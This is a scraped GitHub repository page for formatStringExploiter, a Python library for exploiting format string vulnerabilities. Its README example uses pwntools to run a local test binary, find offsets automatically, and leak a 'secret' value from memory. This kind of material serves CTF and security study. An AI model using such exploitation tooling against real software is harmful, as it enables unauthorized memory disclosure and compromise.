Docs

http://formatstringexploiter.readthedocs.io/en/latest/index.html

formatStringExploiter

Helper script for working with format string bugs

Example

from formatStringExploiter.FormatString import FormatString
from pwn import *
import logging

logging.basicConfig(level=logging.WARN)
log = logging.getLogger()

elf = ELF("formatStringTest")

# Defining format string executor here
def exec_fmt(s):
    p = process("./formatStringTest",buffer_fill_size=0xffff)
    p.sendline(s)
    p.recvuntil("Input a format string: ")
    out = p.recvuntil("Logged in",drop=True)
    p.close()
    return out

# Create the class and self-discover the correct offsets
fmtStr = FormatString(exec_fmt,elf=elf)

# Leak some point in memory as a string
fmtStr[elf.symbols['secret']]

# Equivalently, but with caching and more smarts...
fmtStr.leak.s(elf.symbols['secret'])

Name		Name	Last commit message	Last commit date
Latest commit History 107 Commits
.github/workflows		.github/workflows
docs		docs
formatStringExploiter		formatStringExploiter
tests		tests
.gitignore		.gitignore
Dockerfile.bionic		Dockerfile.bionic
README.md		README.md
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Docs

formatStringExploiter

About

Releases

Packages

Contributors 2

Languages

bannsec/formatStringExploiter

Folders and files

Latest commit

History

Repository files navigation

Docs

formatStringExploiter

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages